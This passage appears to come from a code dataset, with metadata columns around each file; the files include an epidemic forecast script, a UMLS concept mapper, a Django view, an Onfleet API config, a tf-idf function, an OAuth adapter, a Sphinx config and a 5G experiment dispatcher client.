cross_border_state=None,cases_file_date=case_file_date, # ps_list = ps_prior, # ) # elif state in ['NSW']: # forecast_dict[state] = Forecast(current[state], # state,start_date,people, # alpha_i= 1, k =0.1,gam_list=gam, # qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior, # qua_ai=1,qua_qi_factor=1,qua_qs_factor=1, # forecast_R =forecast_type, R_I = R_I,forecast_date=forecast_date, # cross_border_state=None,cases_file_date=case_file_date, # ps_list = ps_prior, # ) # elif state in ['ACT','NT']: # forecast_dict[state] = Forecast(current[state], # state,start_date,people, # alpha_i= 0.5, k =0.1,gam_list=gam, # qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior, # qua_ai=1,qua_qi_factor=1,qua_qs_factor=1, # forecast_R =forecast_type, R_I = R_I,forecast_date=forecast_date, # cross_border_state=None,cases_file_date=case_file_date, # ps_list = ps_prior, # ) # else: # forecast_dict[state] = Forecast(current[state],state, # start_date,people, # alpha_i= 0.5, k =0.1,gam_list=gam, # qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior, # qua_ai=1,qua_qi_factor=1,qua_qs_factor=1, # forecast_R = forecast_type , R_I = R_I,forecast_date=forecast_date, # cases_file_date=case_file_date, # ps_list = ps_prior, # ) # if __name__ =="__main__": # for key,item in forecast_dict.items(): # item.read_in_Reff() # pool = mp.Pool(8) # l_df_results =pool.map(worker, # [(obj,'simulate_many',time_end, n_sims) # for key,obj in forecast_dict.items()] # ) # pool.close() # pool.join() # #record quantiles in separate file # dic_states={ # 'state':[], # 'date':[], # 'type':[], # 'bottom':[], # 'lower':[], # 'median':[], # 'upper':[], # 'top':[], # } # dates =pd.date_range(start = start_date, # periods=time_end #num of days # ) # vars_l = ['symp_inci_obs','imports_inci_obs','asymp_inci_obs','symp_inci','asymp_inci','imports_inci','total_inci','total_inci_obs'] # for var in vars_l: # for state,df in l_df_results: # df = df[[col.strftime('%Y-%m-%d') for # col in dates]] # quantiles = df.loc[var].quantile([0.05,0.25,0.5,0.75,0.95],axis=0) # dic_states['state'].extend([state]*len(dates)) # dic_states['date'].extend(df.columns) # dic_states['type'].extend([var]*len(dates)) # dic_states['bottom'].extend(quantiles.loc[0.05]) # dic_states['lower'].extend(quantiles.loc[0.25]) # dic_states['median'].extend(quantiles.loc[0.50]) # dic_states['upper'].extend(quantiles.loc[0.75]) # dic_states['top'].extend(quantiles.loc[0.95]) # plots =pd.DataFrame.from_dict(dic_states) # plots.to_parquet('./results/quantiles'+forecast_type+start_date+"sim_"+str(n_sims)+"days_"+str(time_end)+".parquet") | 2.134897 | 2 |
machine_read_scripts/NER_metamap.py | sanyabt/napdi-kg | 3 | 6616701 | from pymetamap import MetaMap
import pickle
import os
import indra
import re
from indra.statements import stmts_from_json_file
#create instance for metamap API, path from local file
workingDir = os.getcwd()
dir_out = workingDir + '/output_files/'
file_reach = dir_out + 'kratom/0_58_reach_output_assembly.json'
dir_log = workingDir + '/logs/'
mm = MetaMap.get_instance('/media/extension-1/UMLS/MetaMap/public_mm/bin/metamap')
with open(dir_out+'umls_dict.pickle', 'rb') as file_p:
umls_dict = pickle.load(file_p)
#make more sophisticated> currently takes the first MetaMap concept as highest score (same scores ignored)
def extract_concepts_umls(entity, umls_count):
#re.sub(r”\(|\)“, “”, text)
entity = re.sub(r'\(|\)', '', entity)
entity = re.sub(r'[^\x00-\x7F]+','', entity)
text = [entity]
#take the concept with highest score
concepts,error = mm.extract_concepts(text)
if concepts:
concept = concepts[0]
try:
umls_dict[entity] = {
'cui': concept.cui,
'umls_term': concept.preferred_name,
'sem_type': concept.semtypes.strip('][').split(','),
'score': float(concept.score)
}
umls_count += 1
except AttributeError:
pass
return umls_count
if __name__ == '__main__':
umls_count = 0
reach_concepts = []
stmts = stmts_from_json_file(file_reach)
#for item in stmts:
# reach_concepts.extend(item.agent_list())
for item in stmts:
agents_list = item.agent_list()
for agent in agents_list:
if agent:
if agent.db_refs:
if 'TEXT' in agent.db_refs:
reach_concepts.append(agent.db_refs['TEXT'])
else:
reach_concepts.extend(item.agent_list())
else:
reach_concepts.extend(item.agent_list())
else:
reach_concepts.extend(item.agent_list())
concepts = set(reach_concepts)
#call function to extract concepts
concepts_list = list(concepts)
print(len(concepts_list))
index = 0
for concept in concepts_list:
umls_count = extract_concepts_umls(str(concept), umls_count)
index += 1
if index%1000 == 0:
print(index)
total_count = len(concepts_list)
#save dictionaries to pickle files
with open(dir_out+'umls_dict_20211004.pickle', 'wb') as file_o:
pickle.dump(umls_dict, file_o)
with open(dir_log+'NER_log.txt', 'w') as file_log:
file_log.write('Total concepts = '+str(total_count))
file_log.write('\nUMLS mapped concepts = '+str(umls_count))
| from pymetamap import MetaMap
import pickle
import os
import indra
import re
from indra.statements import stmts_from_json_file
#create instance for metamap API, path from local file
workingDir = os.getcwd()
dir_out = workingDir + '/output_files/'
file_reach = dir_out + 'kratom/0_58_reach_output_assembly.json'
dir_log = workingDir + '/logs/'
mm = MetaMap.get_instance('/media/extension-1/UMLS/MetaMap/public_mm/bin/metamap')
with open(dir_out+'umls_dict.pickle', 'rb') as file_p:
umls_dict = pickle.load(file_p)
#make more sophisticated> currently takes the first MetaMap concept as highest score (same scores ignored)
def extract_concepts_umls(entity, umls_count):
#re.sub(r”\(|\)“, “”, text)
entity = re.sub(r'\(|\)', '', entity)
entity = re.sub(r'[^\x00-\x7F]+','', entity)
text = [entity]
#take the concept with highest score
concepts,error = mm.extract_concepts(text)
if concepts:
concept = concepts[0]
try:
umls_dict[entity] = {
'cui': concept.cui,
'umls_term': concept.preferred_name,
'sem_type': concept.semtypes.strip('][').split(','),
'score': float(concept.score)
}
umls_count += 1
except AttributeError:
pass
return umls_count
if __name__ == '__main__':
umls_count = 0
reach_concepts = []
stmts = stmts_from_json_file(file_reach)
#for item in stmts:
# reach_concepts.extend(item.agent_list())
for item in stmts:
agents_list = item.agent_list()
for agent in agents_list:
if agent:
if agent.db_refs:
if 'TEXT' in agent.db_refs:
reach_concepts.append(agent.db_refs['TEXT'])
else:
reach_concepts.extend(item.agent_list())
else:
reach_concepts.extend(item.agent_list())
else:
reach_concepts.extend(item.agent_list())
concepts = set(reach_concepts)
#call function to extract concepts
concepts_list = list(concepts)
print(len(concepts_list))
index = 0
for concept in concepts_list:
umls_count = extract_concepts_umls(str(concept), umls_count)
index += 1
if index%1000 == 0:
print(index)
total_count = len(concepts_list)
#save dictionaries to pickle files
with open(dir_out+'umls_dict_20211004.pickle', 'wb') as file_o:
pickle.dump(umls_dict, file_o)
with open(dir_log+'NER_log.txt', 'w') as file_log:
file_log.write('Total concepts = '+str(total_count))
file_log.write('\nUMLS mapped concepts = '+str(umls_count))
| en | 0.791027 | #create instance for metamap API, path from local file #make more sophisticated> currently takes the first MetaMap concept as highest score (same scores ignored) #re.sub(r”\(|\)“, “”, text) #take the concept with highest score #for item in stmts: # reach_concepts.extend(item.agent_list()) #call function to extract concepts #save dictionaries to pickle files | 2.353041 | 2 |
makahiki/apps/widgets/status/referrals/views.py | justinslee/Wai-Not-Makahiki | 1 | 6616702 | """handles request for referral status."""
from django.db.models.aggregates import Count
from apps.managers.player_mgr.models import Profile
def supply(request, page_name):
"""supply view_objects for user status."""
_ = page_name
_ = request
# Find referrals.
referrals = Profile.objects.filter(referring_user__isnull=False).values(
'referring_user__profile__name', 'referring_user__username').annotate(
referrals=Count('referring_user')
)
return {
'referrals': referrals,
}
| """handles request for referral status."""
from django.db.models.aggregates import Count
from apps.managers.player_mgr.models import Profile
def supply(request, page_name):
"""supply view_objects for user status."""
_ = page_name
_ = request
# Find referrals.
referrals = Profile.objects.filter(referring_user__isnull=False).values(
'referring_user__profile__name', 'referring_user__username').annotate(
referrals=Count('referring_user')
)
return {
'referrals': referrals,
}
| en | 0.690949 | handles request for referral status. supply view_objects for user status. # Find referrals. | 2.26635 | 2 |
onfleet/config.py | saduqz/pyonfleet | 0 | 6616703 | <gh_stars>0
class Config(object):
data = dict(
URL = dict(
base_url = "https://onfleet.com/api/",
version = "v2/",
auth_test = "auth/test/"
),
RESOURCES = dict(
admins = dict(
GET = dict(
get = "/admins"
),
POST = dict(
create = "/admins"
),
PUT = dict(
update = "/admins/:adminId"
),
DELETE = dict(
deleteOne = "/admins/:adminId"
)
),
administrators = dict(
GET = dict(
get = "/admins"
),
POST = dict(
create = "/admins"
),
PUT = dict(
update = "/admins/:adminId"
),
DELETE = dict(
deleteOne = "/admins/:adminId"
)
),
containers = dict(
GET = dict(
get = "/containers/:param/:containerId"
),
PUT = dict(
update = "/containers/:containerId"
)
),
destinations = dict(
GET = dict(
get = "/destinations/:destinationId"
),
POST = dict(
create = "/destinations"
)
),
hubs = dict(
GET = dict(
get = "/hubs"
)
),
organization = dict(
GET = dict(
get = ["/organization", "/organizations/:orgId"]
),
PUT = dict(
insertTask = "/containers/organization/:orgId"
)
),
recipients = dict(
GET = dict(
get = "/recipients/:recipientId"
),
POST = dict(
create = "/recipients"
),
PUT = dict(
update = "/recipients/:recipientId"
)
),
tasks = dict(
GET = dict(
get = ["/tasks/all", "/tasks/:taskId"]
),
POST = dict(
create = "/tasks",
clone = "/tasks/:taskId/clone",
forceComplete = "/tasks/:taskId/complete",
batchCreate = "/tasks/batch",
autoAssign = "/tasks/autoAssign"
),
PUT = dict(
update = "/tasks/:taskId"
),
DELETE = dict(
deleteOne = "/tasks/:taskId"
)
),
teams = dict(
GET = dict(
get = ["/teams", "/teams/:teamId"]
),
POST = dict(
create = "/teams"
),
PUT = dict(
update = "/teams/:teamId",
insertTask = "/containers/teams/:teamId"
),
DELETE = dict(
deleteOne = "/teams/:teamId"
)
),
workers = dict(
GET = dict(
get = ["/workers", "/workers/:workerId"],
getSchedule = "/workers/:workerId/schedule",
getByLocation = "/workers/location"
),
POST = dict(
create = "/workers",
setSchedule = "/workers/:workerId/schedule"
),
PUT = dict(
update = "/workers/:workerId",
insertTask = "/containers/workers/:workerId"
),
DELETE = dict(
deleteOne = "/workers/:workerId"
)
),
webhooks = dict(
GET = dict(
get = "/webhooks"
),
POST = dict(
create = "/webhooks"
),
DELETE = dict(
deleteOne = "/webhooks/:webhookId"
)
)
)
) | class Config(object):
data = dict(
URL = dict(
base_url = "https://onfleet.com/api/",
version = "v2/",
auth_test = "auth/test/"
),
RESOURCES = dict(
admins = dict(
GET = dict(
get = "/admins"
),
POST = dict(
create = "/admins"
),
PUT = dict(
update = "/admins/:adminId"
),
DELETE = dict(
deleteOne = "/admins/:adminId"
)
),
administrators = dict(
GET = dict(
get = "/admins"
),
POST = dict(
create = "/admins"
),
PUT = dict(
update = "/admins/:adminId"
),
DELETE = dict(
deleteOne = "/admins/:adminId"
)
),
containers = dict(
GET = dict(
get = "/containers/:param/:containerId"
),
PUT = dict(
update = "/containers/:containerId"
)
),
destinations = dict(
GET = dict(
get = "/destinations/:destinationId"
),
POST = dict(
create = "/destinations"
)
),
hubs = dict(
GET = dict(
get = "/hubs"
)
),
organization = dict(
GET = dict(
get = ["/organization", "/organizations/:orgId"]
),
PUT = dict(
insertTask = "/containers/organization/:orgId"
)
),
recipients = dict(
GET = dict(
get = "/recipients/:recipientId"
),
POST = dict(
create = "/recipients"
),
PUT = dict(
update = "/recipients/:recipientId"
)
),
tasks = dict(
GET = dict(
get = ["/tasks/all", "/tasks/:taskId"]
),
POST = dict(
create = "/tasks",
clone = "/tasks/:taskId/clone",
forceComplete = "/tasks/:taskId/complete",
batchCreate = "/tasks/batch",
autoAssign = "/tasks/autoAssign"
),
PUT = dict(
update = "/tasks/:taskId"
),
DELETE = dict(
deleteOne = "/tasks/:taskId"
)
),
teams = dict(
GET = dict(
get = ["/teams", "/teams/:teamId"]
),
POST = dict(
create = "/teams"
),
PUT = dict(
update = "/teams/:teamId",
insertTask = "/containers/teams/:teamId"
),
DELETE = dict(
deleteOne = "/teams/:teamId"
)
),
workers = dict(
GET = dict(
get = ["/workers", "/workers/:workerId"],
getSchedule = "/workers/:workerId/schedule",
getByLocation = "/workers/location"
),
POST = dict(
create = "/workers",
setSchedule = "/workers/:workerId/schedule"
),
PUT = dict(
update = "/workers/:workerId",
insertTask = "/containers/workers/:workerId"
),
DELETE = dict(
deleteOne = "/workers/:workerId"
)
),
webhooks = dict(
GET = dict(
get = "/webhooks"
),
POST = dict(
create = "/webhooks"
),
DELETE = dict(
deleteOne = "/webhooks/:webhookId"
)
)
)
) | none | 1 | 2.018031 | 2 | |
vector_semantics/tf_idf.py | newvicklee/nlp_algorithms | 0 | 6616704 | """
Term frequency - inverse document frequency (tf-idf)
Parameters:
documents: an array of strings
Returns:
m: term-document matrix where each row is a vector of the word represented by tf-idf scores in each document/column
documents = [
"a fox swimming across a river",
"was barely able to reach the bank",
"where he lay bruised and exhausted from his struggle with the swift current",
"soon a swarm of blood-sucking flies settled on him",
"but he lay quietly, still too weak to run away from them",
"a hedgehog happened by.",
"let me drive the flies away, he said kindly.",
"no, no! exclaimed the fox, do not disturb them!",
]
matrix, word_to_index = tf_idf(documents)
matrix[word_to_index['fox']]
# word vector for fox: [0.18123812 0. 0. 0. 0. 0.
0. 0.18123812]
"""
import re
import math
import numpy as np
def tf_idf(documents):
def get_vocab(documents):
v = set()
for doc in documents:
v.update(re.split('\W+', doc))
return v
def get_idf(documents, vocab):
N = len(documents)
idf = {}
for w in vocab:
idf[w] = 0
for doc in documents:
if w in doc:
idf[w] += 1
idf[w] = math.log10(N / idf[w])
return idf
vocab = get_vocab(documents)
num_of_docs = len(documents)
idf = get_idf(documents, vocab)
m = np.zeros((len(vocab), num_of_docs))
word_to_index = {}
for w_idx, word in enumerate(vocab):
word_to_index[word] = w_idx
for d_idx, doc in enumerate(documents):
tf = math.log10(doc.count(word) + 1)
tf_idf = tf * idf[word]
m[w_idx, d_idx] = tf_idf
return m, word_to_index
| """
Term frequency - inverse document frequency (tf-idf)
Parameters:
documents: an array of strings
Returns:
m: term-document matrix where each row is a vector of the word represented by tf-idf scores in each document/column
documents = [
"a fox swimming across a river",
"was barely able to reach the bank",
"where he lay bruised and exhausted from his struggle with the swift current",
"soon a swarm of blood-sucking flies settled on him",
"but he lay quietly, still too weak to run away from them",
"a hedgehog happened by.",
"let me drive the flies away, he said kindly.",
"no, no! exclaimed the fox, do not disturb them!",
]
matrix, word_to_index = tf_idf(documents)
matrix[word_to_index['fox']]
# word vector for fox: [0.18123812 0. 0. 0. 0. 0.
0. 0.18123812]
"""
import re
import math
import numpy as np
def tf_idf(documents):
def get_vocab(documents):
v = set()
for doc in documents:
v.update(re.split('\W+', doc))
return v
def get_idf(documents, vocab):
N = len(documents)
idf = {}
for w in vocab:
idf[w] = 0
for doc in documents:
if w in doc:
idf[w] += 1
idf[w] = math.log10(N / idf[w])
return idf
vocab = get_vocab(documents)
num_of_docs = len(documents)
idf = get_idf(documents, vocab)
m = np.zeros((len(vocab), num_of_docs))
word_to_index = {}
for w_idx, word in enumerate(vocab):
word_to_index[word] = w_idx
for d_idx, doc in enumerate(documents):
tf = math.log10(doc.count(word) + 1)
tf_idf = tf * idf[word]
m[w_idx, d_idx] = tf_idf
return m, word_to_index
| en | 0.888743 | Term frequency - inverse document frequency (tf-idf) Parameters: documents: an array of strings Returns: m: term-document matrix where each row is a vector of the word represented by tf-idf scores in each document/column documents = [ "a fox swimming across a river", "was barely able to reach the bank", "where he lay bruised and exhausted from his struggle with the swift current", "soon a swarm of blood-sucking flies settled on him", "but he lay quietly, still too weak to run away from them", "a hedgehog happened by.", "let me drive the flies away, he said kindly.", "no, no! exclaimed the fox, do not disturb them!", ] matrix, word_to_index = tf_idf(documents) matrix[word_to_index['fox']] # word vector for fox: [0.18123812 0. 0. 0. 0. 0. 0. 0.18123812] | 3.849041 | 4 |
allauth/socialaccount/providers/mixer/views.py | wisr/django-allauth | 2 | 6616705 | <gh_stars>1-10
import requests
from allauth.socialaccount.providers.oauth2.views import (
OAuth2Adapter,
OAuth2CallbackView,
OAuth2LoginView,
)
from .provider import MixerProvider
class MixerOAuth2Adapter(OAuth2Adapter):
provider_id = MixerProvider.id
access_token_url = 'https://mixer.com/api/v1/oauth/token'
authorize_url = 'https://mixer.com/oauth/authorize'
profile_url = 'https://mixer.com/api/v1/users/current'
def complete_login(self, request, app, token, **kwargs):
headers = {'Authorization': 'Bearer {}'.format(token.token)}
response = requests.get(self.profile_url, headers=headers)
response.raise_for_status()
data = response.json()
return self.get_provider().sociallogin_from_response(
request, data
)
oauth2_login = OAuth2LoginView.adapter_view(MixerOAuth2Adapter)
oauth2_callback = OAuth2CallbackView.adapter_view(MixerOAuth2Adapter)
| import requests
from allauth.socialaccount.providers.oauth2.views import (
OAuth2Adapter,
OAuth2CallbackView,
OAuth2LoginView,
)
from .provider import MixerProvider
class MixerOAuth2Adapter(OAuth2Adapter):
provider_id = MixerProvider.id
access_token_url = 'https://mixer.com/api/v1/oauth/token'
authorize_url = 'https://mixer.com/oauth/authorize'
profile_url = 'https://mixer.com/api/v1/users/current'
def complete_login(self, request, app, token, **kwargs):
headers = {'Authorization': 'Bearer {}'.format(token.token)}
response = requests.get(self.profile_url, headers=headers)
response.raise_for_status()
data = response.json()
return self.get_provider().sociallogin_from_response(
request, data
)
oauth2_login = OAuth2LoginView.adapter_view(MixerOAuth2Adapter)
oauth2_callback = OAuth2CallbackView.adapter_view(MixerOAuth2Adapter) | none | 1 | 2.332892 | 2 | |
.docs/conf.py | Amacc/SNowCli | 0 | 6616706 |
author = '<NAME>'
copyright = '2018, <NAME>'
description = 'Just playing around with cli commands'
exclude_patterns = ['_build','**/venv']
extensions = ['sphinx_click.ext']
html_theme = 'sphinx_rtd_theme'
htmlhelp_basename = 'SnowCli'
master_doc= 'index'
project = 'snowcli'
project_short_name ='snowcli'
pygments_style = 'sphinx'
todo_include_todos = True
todo_link_only = True
latex_elements = {}
latex_documents = [
(master_doc, f'{project_short_name}.tex', project,
author, 'manual'),
]
man_pages = [
(master_doc, project_short_name, project,
[author], 1)
]
texinfo_documents = [
(master_doc, project_short_name, project,
author, project_short_name, description,
'Miscellaneous'),
]
intersphinx_mapping = {'https://docs.python.org/': None}
import sys, os
sys.path.append(os.path.abspath('..'))
|
author = '<NAME>'
copyright = '2018, <NAME>'
description = 'Just playing around with cli commands'
exclude_patterns = ['_build','**/venv']
extensions = ['sphinx_click.ext']
html_theme = 'sphinx_rtd_theme'
htmlhelp_basename = 'SnowCli'
master_doc= 'index'
project = 'snowcli'
project_short_name ='snowcli'
pygments_style = 'sphinx'
todo_include_todos = True
todo_link_only = True
latex_elements = {}
latex_documents = [
(master_doc, f'{project_short_name}.tex', project,
author, 'manual'),
]
man_pages = [
(master_doc, project_short_name, project,
[author], 1)
]
texinfo_documents = [
(master_doc, project_short_name, project,
author, project_short_name, description,
'Miscellaneous'),
]
intersphinx_mapping = {'https://docs.python.org/': None}
import sys, os
sys.path.append(os.path.abspath('..'))
| none | 1 | 1.472645 | 1 | |
REST/dispatcherApi.py | 5genesis/Portal | 1 | 6616707 | <gh_stars>1-10
import json
from typing import Dict, Tuple, Optional, List
from app.models import User, Experiment
from .restClient import RestClient, Payload
from base64 import b64encode
from Helper import Config, Log, LogInfo
from app import db
from datetime import datetime, timezone
from os.path import split
class VimInfo:
def __init__(self, data):
self.Name = data['name']
self.Type = data['type']
self.Location = data['location']
def __str__(self):
return f'{self.Name} ({self.Type} - {self.Location})'
class DispatcherApi(RestClient):
def __init__(self):
config = Config().Dispatcher
super().__init__(config.Host, config.Port, "", https=True, insecure=True)
self.tokenExpiry = config.TokenExpiry
@staticmethod
def basicAuthHeader(user: str, password: str) -> Dict:
encoded = b64encode(bytes(f'{user}:{password}'.encode('ascii')))
return {'Authorization': f'Basic {encoded.decode("ascii")}'}
@staticmethod
def bearerAuthHeader(token: str) -> Dict:
return {'Authorization': f'Bearer {token}'}
def Register(self, user: User) -> Tuple[str, bool]:
""" Returns (<message>, <success>). """
url = '/auth/register'
data = {
'username': user.username,
'email': user.email,
'password': <PASSWORD>
}
try:
response = self.HttpPost(url, body=data, payload=Payload.Form)
status = self.ResponseStatusCode(response)
if status in [400, 200]:
message = self.ResponseToJson(response)['result']
return message, (status == 200)
else:
raise Exception(f"Status {status} ({response.reason})")
except Exception as e:
return f"Exception while accessing authentication: {e}", False
def GetToken(self, user: User) -> Tuple[str, bool]:
"""
Return a tuple (str, bool). The string contains the token OR the
error message, the boolean indicates success.
"""
url = '/auth/get_token'
try:
response = self.HttpGet(url, extra_headers=self.basicAuthHeader(user.username, user.password_hash))
status = self.ResponseStatusCode(response)
if status in [400, 200]:
result = self.ResponseToJson(response)['result']
return result, (status == 200)
else:
raise Exception(f"Status {status} ({response.reason})")
except Exception as e:
message = f"Error while retrieving token: {e}"
Log.E(message)
return message, False
def RenewUserToken(self, user: User) -> Optional[str]:
"""Returns None if no error, an error message otherwise"""
token, success = self.GetToken(user)
user.token = token if success else None
user.tokenTimestamp = datetime.now(timezone.utc) if success else None
db.session.add(user)
db.session.commit()
return token if not success else None
def RenewUserTokenIfExpired(self, user) -> Optional[str]:
"""Returns None if no error, an error message otherwise"""
tokenTimestamp = user.tokenTimestamp if user.tokenTimestamp is not None else datetime.min
tokenTimestamp = tokenTimestamp.replace(tzinfo=timezone.utc)
timespan = datetime.now(timezone.utc) - tokenTimestamp
if timespan.total_seconds() >= self.tokenExpiry:
return self.RenewUserToken(user)
else:
return None
def RunCampaign(self, experimentId: int, user: User) -> Dict:
maybeError = self.RenewUserTokenIfExpired(user)
if maybeError is not None:
return {"ExecutionId": None, "Success": False, "Message": maybeError}
token = user.CurrentDispatcherToken
descriptor = json.dumps(Experiment.query.get(experimentId).serialization())
url = f'/elcm/api/v0/run'
response = self.HttpPost(url, {'Content-Type': 'application/json', **self.bearerAuthHeader(token)}, descriptor)
status = RestClient.ResponseStatusCode(response)
if status != 200:
return {"ExecutionId": None, "Success": False,
"Message": f"Execution request failed with status {status}"}
else:
response = RestClient.ResponseToJson(response)
response.update({"Success": True, "Message": "No error"})
return response
def GetExecutionLogs(self, executionId: int, user: User) -> Dict:
maybeError = self.RenewUserTokenIfExpired(user)
if maybeError is not None:
empty = LogInfo.Empty()
return {'PreRun': empty, 'Executor': empty, 'PostRun': empty, 'Status': maybeError}
token = user.CurrentDispatcherToken
url = f'/elcmexecution/{executionId}/logs'
response = self.HttpGet(url, extra_headers=self.bearerAuthHeader(token))
return RestClient.ResponseToJson(response)
def basicGet(self, user: User, url: str, kind: str) -> Tuple[object, Optional[str]]:
try:
maybeError = self.RenewUserTokenIfExpired(user)
if maybeError is not None:
return {}, maybeError
token = user.CurrentDispatcherToken
response = self.HttpGet(url, extra_headers=self.bearerAuthHeader(token))
return self.ResponseToJson(response), None
except Exception as e:
return {}, f"Exception while retrieving list of {kind}: {e}"
def GetVimLocations(self, user: User) -> Tuple[List[VimInfo], Optional[str]]:
data, error = self.basicGet(user, '/mano/vims', 'VIMs') # type: List, Optional[str]
return [VimInfo(vim) for vim in data] if error is None else [], error
def GetVimLocationImages(self, user: User, vim_name: str) -> Tuple[List[VimInfo], Optional[str]]:
data, error = self.basicGet(user, '/mano/image', f"images for VIM '{vim_name}'") # type: Dict, Optional[str]
return data.get(vim_name, []) if error is None else [], error
def GetAvailableVnfds(self, user: User) -> Tuple[List[str], Optional[str]]:
data, error = self.basicGet(user, '/mano/vnfd', f"VNFDs") # type: Dict, Optional[str]
return data if error is None else [], error
def GetAvailableNsds(self, user: User) -> Tuple[List[str], Optional[str]]:
data, error = self.basicGet(user, '/mano/nsd', f"NSDs") # type: Dict, Optional[str]
return data if error is None else [], error
def handleErrorcodes(self, code: int, data: Dict, overrides: Dict[int, str] = None) -> str:
defaults = {
400: "Invalid Input",
401: "Invalid permission",
404: "Not found",
406: "File not valid",
409: "Conflict",
413: "File too large",
422: "Unprocessable entity",
500: "Internal server error" # Or an unknown error code
}
overrides = {} if overrides is None else overrides
error = overrides.get(code, defaults.get(code, defaults[500]))
if code in [400, 404, 409, 422]:
extra = f" (Status: {data['status']}, Code: {data['code']}, Detail: {data['detail']})"
elif code == 401:
extra = ""
else:
extra = f" (Code {code})"
return error + extra
def OnboardVnfd(self, path: str, token: str, visibility: bool) -> Tuple[str, bool]:
"""Returns a pair of str (id or error message) and bool (success)"""
url = '/mano/vnfd'
overrides = {409: "Conflict - VNFD already present"}
return self._onboardVnfdOrNsd(url, path, token, 'VNFs', overrides, visibility)
def OnboardNsd(self, path: str, token: str, visibility: bool) -> Tuple[str, bool]:
"""Returns a pair of str (id or error message) and bool (success)"""
url = '/mano/nsd'
overrides = {409: "Conflict - NSD already present"}
return self._onboardVnfdOrNsd(url, path, token, "NSs", overrides, visibility)
def _onboardVnfdOrNsd(self, url: str, path: str, token: str, dictId: str, overrides: Dict, visibility: bool):
with open(path, "br") as file:
data = {'visibility': str(visibility).lower()}
response = self.HttpPost(url, extra_headers=self.bearerAuthHeader(token), files={'file': file},
body=data, payload=Payload.Form)
code = self.ResponseStatusCode(response)
data = self.ResponseToJson(response)
if code == 200:
try:
return list(data[dictId].keys())[0], True
except (KeyError, IndexError, AttributeError):
return split(path)[1], True
elif code == 400:
try:
return data['error'], False
except KeyError:
return str(data), False
else:
return self.handleErrorcodes(code, data, overrides), False
def OnboardVim(self, path: str, vimName: str, token: str, visibility: str) -> Optional[str]:
"""Returns an error message, or None on success"""
with open(path, "br") as file:
containerFormat = "bare"
data = {'vim_id': vimName, 'container_format': containerFormat,
'visibility': str(visibility).lower()}
response = self.HttpPost('/mano/image', extra_headers=self.bearerAuthHeader(token),
body=data, files={'file': file}, payload=Payload.Form)
code = self.ResponseStatusCode(response)
if 200 <= code <= 299:
return None
else:
try:
data = self.ResponseToJson(response)
return data.get('detail', data.get('result', f'Unknown error. Status code: {code}'))
except Exception as e:
raise Exception(f"Unknown exception '{e}'. Status code: {code}")
| import json
from typing import Dict, Tuple, Optional, List
from app.models import User, Experiment
from .restClient import RestClient, Payload
from base64 import b64encode
from Helper import Config, Log, LogInfo
from app import db
from datetime import datetime, timezone
from os.path import split
class VimInfo:
def __init__(self, data):
self.Name = data['name']
self.Type = data['type']
self.Location = data['location']
def __str__(self):
return f'{self.Name} ({self.Type} - {self.Location})'
class DispatcherApi(RestClient):
def __init__(self):
config = Config().Dispatcher
super().__init__(config.Host, config.Port, "", https=True, insecure=True)
self.tokenExpiry = config.TokenExpiry
@staticmethod
def basicAuthHeader(user: str, password: str) -> Dict:
encoded = b64encode(bytes(f'{user}:{password}'.encode('ascii')))
return {'Authorization': f'Basic {encoded.decode("ascii")}'}
@staticmethod
def bearerAuthHeader(token: str) -> Dict:
return {'Authorization': f'Bearer {token}'}
def Register(self, user: User) -> Tuple[str, bool]:
""" Returns (<message>, <success>). """
url = '/auth/register'
data = {
'username': user.username,
'email': user.email,
'password': <PASSWORD>
}
try:
response = self.HttpPost(url, body=data, payload=Payload.Form)
status = self.ResponseStatusCode(response)
if status in [400, 200]:
message = self.ResponseToJson(response)['result']
return message, (status == 200)
else:
raise Exception(f"Status {status} ({response.reason})")
except Exception as e:
return f"Exception while accessing authentication: {e}", False
def GetToken(self, user: User) -> Tuple[str, bool]:
"""
Return a tuple (str, bool). The string contains the token OR the
error message, the boolean indicates success.
"""
url = '/auth/get_token'
try:
response = self.HttpGet(url, extra_headers=self.basicAuthHeader(user.username, user.password_hash))
status = self.ResponseStatusCode(response)
if status in [400, 200]:
result = self.ResponseToJson(response)['result']
return result, (status == 200)
else:
raise Exception(f"Status {status} ({response.reason})")
except Exception as e:
message = f"Error while retrieving token: {e}"
Log.E(message)
return message, False
def RenewUserToken(self, user: User) -> Optional[str]:
"""Returns None if no error, an error message otherwise"""
token, success = self.GetToken(user)
user.token = token if success else None
user.tokenTimestamp = datetime.now(timezone.utc) if success else None
db.session.add(user)
db.session.commit()
return token if not success else None
def RenewUserTokenIfExpired(self, user) -> Optional[str]:
"""Returns None if no error, an error message otherwise"""
tokenTimestamp = user.tokenTimestamp if user.tokenTimestamp is not None else datetime.min
tokenTimestamp = tokenTimestamp.replace(tzinfo=timezone.utc)
timespan = datetime.now(timezone.utc) - tokenTimestamp
if timespan.total_seconds() >= self.tokenExpiry:
return self.RenewUserToken(user)
else:
return None
def RunCampaign(self, experimentId: int, user: User) -> Dict:
maybeError = self.RenewUserTokenIfExpired(user)
if maybeError is not None:
return {"ExecutionId": None, "Success": False, "Message": maybeError}
token = user.CurrentDispatcherToken
descriptor = json.dumps(Experiment.query.get(experimentId).serialization())
url = f'/elcm/api/v0/run'
response = self.HttpPost(url, {'Content-Type': 'application/json', **self.bearerAuthHeader(token)}, descriptor)
status = RestClient.ResponseStatusCode(response)
if status != 200:
return {"ExecutionId": None, "Success": False,
"Message": f"Execution request failed with status {status}"}
else:
response = RestClient.ResponseToJson(response)
response.update({"Success": True, "Message": "No error"})
return response
def GetExecutionLogs(self, executionId: int, user: User) -> Dict:
maybeError = self.RenewUserTokenIfExpired(user)
if maybeError is not None:
empty = LogInfo.Empty()
return {'PreRun': empty, 'Executor': empty, 'PostRun': empty, 'Status': maybeError}
token = user.CurrentDispatcherToken
url = f'/elcmexecution/{executionId}/logs'
response = self.HttpGet(url, extra_headers=self.bearerAuthHeader(token))
return RestClient.ResponseToJson(response)
def basicGet(self, user: User, url: str, kind: str) -> Tuple[object, Optional[str]]:
try:
maybeError = self.RenewUserTokenIfExpired(user)
if maybeError is not None:
return {}, maybeError
token = user.CurrentDispatcherToken
response = self.HttpGet(url, extra_headers=self.bearerAuthHeader(token))
return self.ResponseToJson(response), None
except Exception as e:
return {}, f"Exception while retrieving list of {kind}: {e}"
def GetVimLocations(self, user: User) -> Tuple[List[VimInfo], Optional[str]]:
data, error = self.basicGet(user, '/mano/vims', 'VIMs') # type: List, Optional[str]
